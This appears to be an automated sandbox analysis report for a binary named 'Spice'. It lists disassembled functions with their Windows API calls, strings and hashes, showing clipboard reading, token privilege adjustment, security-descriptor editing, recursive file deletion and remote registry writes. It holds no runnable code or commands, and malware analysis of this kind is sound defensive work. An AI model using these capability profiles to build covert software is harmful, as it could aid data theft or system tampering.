Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 21823410992fbabe4c87581bb0080516edf0666b1a4e5c6f22b0eb1dee5c00dc
Instruction ID: b06555c949f8b95c337fe48f37442532a18c7c325235feda1f7e764c45f238f5
Opcode Fuzzy Hash: 21823410992fbabe4c87581bb0080516edf0666b1a4e5c6f22b0eb1dee5c00dc
Instruction Fuzzy Hash: CCE086369002285BC721A6989C06FEA77DDEB89690F0401F6FC0CD7244D960AC818691

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00ED3BFE), ref: 00ED4FED

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bb0b049b6b07e379126a2d0d96e5f4bbd1bbd68ff09fc02c7712f95a85a91ed4
Instruction ID: 13f40798d48daa830674918bde4eef4f505ed36b9c4f25bcfa9dc1f5e0678d7e
Opcode Fuzzy Hash: bb0b049b6b07e379126a2d0d96e5f4bbd1bbd68ff09fc02c7712f95a85a91ed4
Instruction Fuzzy Hash: 9DB092B5200600579E281F3C19481A93301A9623ADBD83B82E478A56F19A39884FA520

Uniqueness

Uniqueness Score: -1.00%

Function 00E9547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00E95486

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 03c0cbd8687455f1f58341d87f5a6fcb58bd0b75e088b2fc10a14d1a87113332
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 62B0927644020CB7CE122A82EC03A593B699B40A68F408020FB1C2C162A673A6A09689

Uniqueness

Uniqueness Score: -1.00%

Function 00EDC270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00ED4005: FindFirstFileW.KERNEL32(?,?), ref: 00ED407C
Part of subcall function 00ED4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00ED40CC
Part of subcall function 00ED4005: FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED40DD
Part of subcall function 00ED4005: FindClose.KERNEL32(00000000), ref: 00ED40F4

GetLastError.KERNEL32 ref: 00EDC292

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 644ec47776b35b91c1938a36a6475f0df904d21abedc8f0564d210a60006db19
Instruction ID: 63a2ce76cc34d45cce8287af0082608448d12729633040e2672b85f64ac1568e
Opcode Fuzzy Hash: 644ec47776b35b91c1938a36a6475f0df904d21abedc8f0564d210a60006db19
Instruction Fuzzy Hash: 9CF082712105108FCB11EF59D840F5AB7E5EF44320F05C019FA49A7391CB70BC02CB94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00EFD164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EFD208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFD249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EFD28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFD2B8
SendMessageW.USER32 ref: 00EFD2E1
_wcsncpy.LIBCMT ref: 00EFD359
GetKeyState.USER32(00000011), ref: 00EFD37A
GetKeyState.USER32(00000009), ref: 00EFD387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFD39D
GetKeyState.USER32(00000010), ref: 00EFD3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFD3D0
SendMessageW.USER32 ref: 00EFD3F7
SendMessageW.USER32(?,00001030,?,00EFB9BA), ref: 00EFD4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EFD513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EFD526
SetCapture.USER32(?), ref: 00EFD52F
ClientToScreen.USER32(?,?), ref: 00EFD594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EFD5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EFD5BB
ReleaseCapture.USER32 ref: 00EFD5C6
GetCursorPos.USER32(?), ref: 00EFD600
ScreenToClient.USER32(?,?), ref: 00EFD60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD669
SendMessageW.USER32 ref: 00EFD697
SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD6D4
SendMessageW.USER32 ref: 00EFD703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EFD724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EFD733
GetCursorPos.USER32(?), ref: 00EFD753
ScreenToClient.USER32(?,?), ref: 00EFD760
GetParent.USER32(?), ref: 00EFD780
SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD7E9
SendMessageW.USER32 ref: 00EFD81A
ClientToScreen.USER32(?,?), ref: 00EFD878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EFD8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD8D2
SendMessageW.USER32 ref: 00EFD8F5
ClientToScreen.USER32(?,?), ref: 00EFD947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EFD97B

Part of subcall function 00E729AB: GetWindowLongW.USER32(?,000000EB), ref: 00E729BC

GetWindowLongW.USER32(?,000000F0), ref: 00EFDA17

Strings

@GUI_DRAGID, xrefs: 00EFD562
F, xrefs: 00EFD8FB

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: e0223c6f1f53cd2408598ea76ac6ed669828d78dd9afda00239bf6891e71153e
Instruction ID: 19ade4264357fd7a050ed1dc10af0fdaa4ad32dc63045ea59a4005e3a8a454a6
Opcode Fuzzy Hash: e0223c6f1f53cd2408598ea76ac6ed669828d78dd9afda00239bf6891e71153e
Instruction Fuzzy Hash: 7942BC70209349AFD724DF28CC44BBABFE6FF88314F141619F695A72A0CB719854DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EC8F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00EC9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC93E3
Part of subcall function 00EC9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC9410
Part of subcall function 00EC9399: GetLastError.KERNEL32 ref: 00EC941D

_memset.LIBCMT ref: 00EC8F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EC8FC3
CloseHandle.KERNEL32(?), ref: 00EC8FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EC8FEB
GetProcessWindowStation.USER32 ref: 00EC9004
SetProcessWindowStation.USER32(00000000), ref: 00EC900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EC9028

Part of subcall function 00EC8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC8F27), ref: 00EC8DFE
Part of subcall function 00EC8DE9: CloseHandle.KERNEL32(?,?,00EC8F27), ref: 00EC8E10

Strings

, xrefs: 00EC8F80
winsta0, xrefs: 00EC8FE6
default, xrefs: 00EC9023

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 720231fd7f32cc8bb6b3fc2b58a3a096cf2f3714acf3c1b30e8a7346e9f51107
Instruction ID: 84235d51c5d7911afa3ac88f5f8fc48c9f795bd93451dae2cd966f92af76aced
Opcode Fuzzy Hash: 720231fd7f32cc8bb6b3fc2b58a3a096cf2f3714acf3c1b30e8a7346e9f51107
Instruction Fuzzy Hash: EB815B7190124DBFDF119FA4CE4AFEE7BB9BF04308F095159F910B2262DB328A169B50

Uniqueness

Uniqueness Score: -1.00%

Function 00EE4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00F00980), ref: 00EE465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 00EE466A
GetClipboardData.USER32(0000000D), ref: 00EE4672
CloseClipboard.USER32 ref: 00EE467E
GlobalLock.KERNEL32(00000000), ref: 00EE469A
CloseClipboard.USER32 ref: 00EE46A4
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00EE46B9
IsClipboardFormatAvailable.USER32(00000001), ref: 00EE46C6
GetClipboardData.USER32(00000001), ref: 00EE46CE
GlobalLock.KERNEL32(00000000), ref: 00EE46DB
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00EE470F
CloseClipboard.USER32 ref: 00EE481F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: b91f4d0c939ac984d3139b81a21c4932be6c2ab75a02463ec50f70f1da523a09
Instruction ID: 1cfdd2da963dd0785da99f23149929a6a2f81c2fcc4eab8bb2328a820227f527
Opcode Fuzzy Hash: b91f4d0c939ac984d3139b81a21c4932be6c2ab75a02463ec50f70f1da523a09
Instruction Fuzzy Hash: 0051AFB1244289ABD304EF61DC89F6E73E9BF84B10F00552DF54AE22E1DF70D9059B66

Uniqueness

Uniqueness Score: -1.00%

Function 00EDF5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00EDF5F9
_wcscmp.LIBCMT ref: 00EDF60E
_wcscmp.LIBCMT ref: 00EDF625
GetFileAttributesW.KERNEL32(?), ref: 00EDF637
SetFileAttributesW.KERNEL32(?,?), ref: 00EDF651
FindNextFileW.KERNEL32(00000000,?), ref: 00EDF669
FindClose.KERNEL32(00000000), ref: 00EDF674
FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF690
_wcscmp.LIBCMT ref: 00EDF6B7
_wcscmp.LIBCMT ref: 00EDF6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF6E0
SetCurrentDirectoryW.KERNEL32(00F2B578), ref: 00EDF6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF708
FindClose.KERNEL32(00000000), ref: 00EDF715
FindClose.KERNEL32(00000000), ref: 00EDF727

Strings

*.*, xrefs: 00EDF68B
S, xrefs: 00EDF6E2

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*$S
API String ID: 1803514871-3360721001
Opcode ID: ecec668af8deaa91f195e9364de05304c377891a3fd4cceb79cd4ea3f863ebef
Instruction ID: 00e8e806b5b1594e8d347df23b5c1a4bd1ee78a036b47b09705b1c212165fdf2
Opcode Fuzzy Hash: ecec668af8deaa91f195e9364de05304c377891a3fd4cceb79cd4ea3f863ebef
Instruction Fuzzy Hash: 7631A27164121DAADB10DFB4EC49AEE77ACEF09325F141167E816E22A0DF30DA45EA60

Uniqueness

Uniqueness Score: -1.00%

Function 00EDCD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00EDCDD0
FindClose.KERNEL32(00000000), ref: 00EDCE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 00EDCE87
__swprintf.LIBCMT ref: 00EDCED3
__swprintf.LIBCMT ref: 00EDCF16

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

__swprintf.LIBCMT ref: 00EDCF6A

Part of subcall function 00E938C8: __woutput_l.LIBCMT ref: 00E93921

__swprintf.LIBCMT ref: 00EDCFB8

Part of subcall function 00E938C8: __flsbuf.LIBCMT ref: 00E93943
Part of subcall function 00E938C8: __flsbuf.LIBCMT ref: 00E9395B

__swprintf.LIBCMT ref: 00EDD007
__swprintf.LIBCMT ref: 00EDD056
__swprintf.LIBCMT ref: 00EDD0A5

Strings

%4d, xrefs: 00EDCF10
%4d%02d%02d%02d%02d%02d, xrefs: 00EDCECD
%02d, xrefs: 00EDCF5E, 00EDCF68, 00EDCFB6, 00EDD005, 00EDD054, 00EDD0A3

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 8a4dde14741dafa1ba7fbeab9c1db4126632ab03232a101a3148f66be4e35e2a
Instruction ID: d3a9336d11490b15db81832fed17580fc3a8dd70d3335c976c2e4f2482294c79
Opcode Fuzzy Hash: 8a4dde14741dafa1ba7fbeab9c1db4126632ab03232a101a3148f66be4e35e2a
Instruction Fuzzy Hash: 09A13CB1404305ABC714FFA4D985EAFB7ECEF94704F40591AF589E6191EB30EA09CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00F00980,00000000,?,00000000,?,?), ref: 00EF1021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EF1069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EF10F2
RegCloseKey.ADVAPI32(?), ref: 00EF1412
RegCloseKey.ADVAPI32(00000000), ref: 00EF141F

Strings

REG_MULTI_SZ, xrefs: 00EF11DA
REG_DWORD, xrefs: 00EF12E3
REG_BINARY, xrefs: 00EF13AD
REG_EXPAND_SZ, xrefs: 00EF108F
REG_SZ, xrefs: 00EF1130
REG_QWORD, xrefs: 00EF1360

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 634151e674d181a5eba31d49d8b942d4db44d9d604505f8a82567960b75b76c2
Instruction ID: 020d861f219d2917c15bc532af805f6b272d523bf8c78dadac0d063ec7aab9e2
Opcode Fuzzy Hash: 634151e674d181a5eba31d49d8b942d4db44d9d604505f8a82567960b75b76c2
Instruction Fuzzy Hash: 67023875200615DFCB24EF25C841E2AB7E5FF89714F04995CFA99AB2A2CB30ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EDF735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00EDF756
_wcscmp.LIBCMT ref: 00EDF76B
_wcscmp.LIBCMT ref: 00EDF782

Part of subcall function 00ED4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00ED4890

FindNextFileW.KERNEL32(00000000,?), ref: 00EDF7B1
FindClose.KERNEL32(00000000), ref: 00EDF7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF7D8
_wcscmp.LIBCMT ref: 00EDF7FF
_wcscmp.LIBCMT ref: 00EDF816
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF828
SetCurrentDirectoryW.KERNEL32(00F2B578), ref: 00EDF846
FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF850
FindClose.KERNEL32(00000000), ref: 00EDF85D
FindClose.KERNEL32(00000000), ref: 00EDF86F

Strings

j, xrefs: 00EDF82A
*.*, xrefs: 00EDF7D3

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*$j
API String ID: 1824444939-4121651432
Opcode ID: 2630581683d99ad180f4dfc95ea1c3a3e04cb08c6a9ab47ea2de5c7daca7e64e
Instruction ID: b9bbf3e8a21e76706c7de29fc8d63b84f8648de6e748d5ae8a2036e0d1312043
Opcode Fuzzy Hash: 2630581683d99ad180f4dfc95ea1c3a3e04cb08c6a9ab47ea2de5c7daca7e64e
Instruction Fuzzy Hash: 5631167550021E6ADF14DBB4EC49AEE73ACEF09325F100167F805B22A0DB30DE46AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EC88CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8E3C
Part of subcall function 00EC8E20: GetLastError.KERNEL32(?,00EC8900,?,?,?), ref: 00EC8E46
Part of subcall function 00EC8E20: GetProcessHeap.KERNEL32(00000008,?,?,00EC8900,?,?,?), ref: 00EC8E55
Part of subcall function 00EC8E20: HeapAlloc.KERNEL32(00000000,?,00EC8900,?,?,?), ref: 00EC8E5C
Part of subcall function 00EC8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC8E73

Part of subcall function 00EC8EBD: GetProcessHeap.KERNEL32(00000008,00EC8916,00000000,00000000,?,00EC8916,?), ref: 00EC8EC9
Part of subcall function 00EC8EBD: HeapAlloc.KERNEL32(00000000,?,00EC8916,?), ref: 00EC8ED0
Part of subcall function 00EC8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8916,?), ref: 00EC8EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC8931
_memset.LIBCMT ref: 00EC8946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC8965
GetLengthSid.ADVAPI32(?), ref: 00EC8976
GetAce.ADVAPI32(?,00000000,?), ref: 00EC89B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC89CF
GetLengthSid.ADVAPI32(?), ref: 00EC89EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC89FB
HeapAlloc.KERNEL32(00000000), ref: 00EC8A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC8A23
CopySid.ADVAPI32(00000000), ref: 00EC8A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC8A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC8A95

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 1045c0abe233d0548b69e9d2b5274f51edb04302d522cdf23a8e1614ab191556
Instruction ID: 37e5a5170712e6e95aea317541bf97bae3e7f6b2835b0dc1d653ddd3627dd9cf
Opcode Fuzzy Hash: 1045c0abe233d0548b69e9d2b5274f51edb04302d522cdf23a8e1614ab191556
Instruction Fuzzy Hash: 7C614975900209BFDF10DFA5DE45FEEBBB9FF44304F04812AE815A6290DB329A16DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF040D,?,?), ref: 00EF1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0B0C

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EF0BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EF0C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EF0E82
RegCloseKey.ADVAPI32(00000000), ref: 00EF0E8F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
